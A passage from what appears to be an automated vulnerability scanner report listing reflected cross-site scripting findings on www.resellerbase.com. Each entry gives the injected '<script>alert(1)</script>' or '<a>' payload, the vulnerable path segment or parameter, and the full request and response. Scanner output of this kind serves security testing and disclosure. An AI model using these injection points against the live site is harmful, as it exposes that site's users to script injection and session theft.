User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/rating.php5b4c7<script>alert(1)</script>445c91feaa5 was not found on this server.</p>
...[SNIP]...

2.1391. http://www.resellerbase.com/detail/17/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f3bdc<script>alert(1)</script>519c1bdcce4d5f346 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/17/rating.php/f3bdc<script>alert(1)</script>519c1bdcce4d5f346?id=17&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/rating.php/f3bdc<script>alert(1)</script>519c1bdcce4d5f346?id=17&rating=5 was not found on this server.</p>
...[SNIP]...

2.1392. http://www.resellerbase.com/detail/17/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3a14a<script>alert(1)</script>ddefffada1d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/rating.php?3a14a<script>alert(1)</script>ddefffada1d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/rating.php?3a14a<script>alert(1)</script>ddefffada1d=1 was not found on this server.</p>
...[SNIP]...

2.1393. http://www.resellerbase.com/detail/17/resellerclub-com.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/resellerclub-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f3298<script>alert(1)</script>3830c86065 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailf3298<script>alert(1)</script>3830c86065/17/resellerclub-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailf3298<script>alert(1)</script>3830c86065/17/resellerclub-com.html was not found on this server.</p>
...[SNIP]...

2.1394. http://www.resellerbase.com/detail/17/resellerclub-com.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/17/resellerclub-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 25de7<a>2e54469a0c9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/1725de7<a>2e54469a0c9/resellerclub-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1725de7<a>2e54469a0c9/resellerclub-com.html was not found on this server.</p>
...[SNIP]...

2.1395. http://www.resellerbase.com/detail/17/resellerclub-com.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/resellerclub-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bb6b6<script>alert(1)</script>a65421b25d9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/bb6b6<script>alert(1)</script>a65421b25d9 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/bb6b6<script>alert(1)</script>a65421b25d9 was not found on this server.</p>
...[SNIP]...

2.1396. http://www.resellerbase.com/detail/17/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 568db<script>alert(1)</script>511c549b8b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail568db<script>alert(1)</script>511c549b8b3/17/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail568db<script>alert(1)</script>511c549b8b3/17/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1397. http://www.resellerbase.com/detail/17/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1a641<script>alert(1)</script>0ab71411ac7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/171a641<script>alert(1)</script>0ab71411ac7/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/171a641<script>alert(1)</script>0ab71411ac7/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1398. http://www.resellerbase.com/detail/17/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 74bad<script>alert(1)</script>3658693c195 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/search.php74bad<script>alert(1)</script>3658693c195?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/search.php74bad<script>alert(1)</script>3658693c195?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1399. http://www.resellerbase.com/detail/17/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/17/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload ed731<a>38258453aef was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/17/search.php?keyword=search...&Submit3=Searched731<a>38258453aef&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/search.php?keyword=search...&Submit3=Searched731<a>38258453aef&opt=2 was not found on this server.</p>
...[SNIP]...

2.1400. http://www.resellerbase.com/detail/17/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/17/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 7b55c<a>2a9c82df34e was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/17/search.php?keyword=search...7b55c<a>2a9c82df34e&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/search.php?keyword=search...7b55c<a>2a9c82df34e&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1401. http://www.resellerbase.com/detail/17/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2f630<script>alert(1)</script>dcf4176d4a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/search.php?keyword=search...&Submit3=Search&opt=2&2f630<script>alert(1)</script>dcf4176d4a9=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/search.php?keyword=search...&Submit3=Search&opt=2&2f630<script>alert(1)</script>dcf4176d4a9=1 was not found on this server.</p>
...[SNIP]...

2.1402. http://www.resellerbase.com/detail/17/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/17/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload ac5f8<a>56f6b83a287 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/17/search.php?keyword=search...&Submit3=Search&opt=2ac5f8<a>56f6b83a287 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/search.php?keyword=search...&Submit3=Search&opt=2ac5f8<a>56f6b83a287 was not found on this server.</p>
...[SNIP]...

2.1403. http://www.resellerbase.com/detail/17/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a9c6a<script>alert(1)</script>5daf130daab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaila9c6a<script>alert(1)</script>5daf130daab/17/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaila9c6a<script>alert(1)</script>5daf130daab/17/themes/ was not found on this server.</p>
...[SNIP]...

2.1404. http://www.resellerbase.com/detail/17/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6bb7b<script>alert(1)</script>33dd4edb171 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/176bb7b<script>alert(1)</script>33dd4edb171/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/176bb7b<script>alert(1)</script>33dd4edb171/themes/ was not found on this server.</p>
...[SNIP]...

2.1405. http://www.resellerbase.com/detail/17/themes/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7a173<script>alert(1)</script>d043bc89fb1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes7a173<script>alert(1)</script>d043bc89fb1/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes7a173<script>alert(1)</script>d043bc89fb1/ was not found on this server.</p>
...[SNIP]...

2.1406. http://www.resellerbase.com/detail/17/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c46f1<script>alert(1)</script>ead07f6afe7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/?c46f1<script>alert(1)</script>ead07f6afe7=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/?c46f1<script>alert(1)</script>ead07f6afe7=1 was not found on this server.</p>
...[SNIP]...

2.1407. http://www.resellerbase.com/detail/17/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 33fb4<script>alert(1)</script>798697828c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail33fb4<script>alert(1)</script>798697828c1/17/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail33fb4<script>alert(1)</script>798697828c1/17/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1408. http://www.resellerbase.com/detail/17/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4861f<script>alert(1)</script>c57cf5704db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/174861f<script>alert(1)</script>c57cf5704db/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/174861f<script>alert(1)</script>c57cf5704db/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1409. http://www.resellerbase.com/detail/17/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dc323<script>alert(1)</script>1e25ad72a73 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themesdc323<script>alert(1)</script>1e25ad72a73/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themesdc323<script>alert(1)</script>1e25ad72a73/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1410. http://www.resellerbase.com/detail/17/themes/kosmos/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/

Issue detail

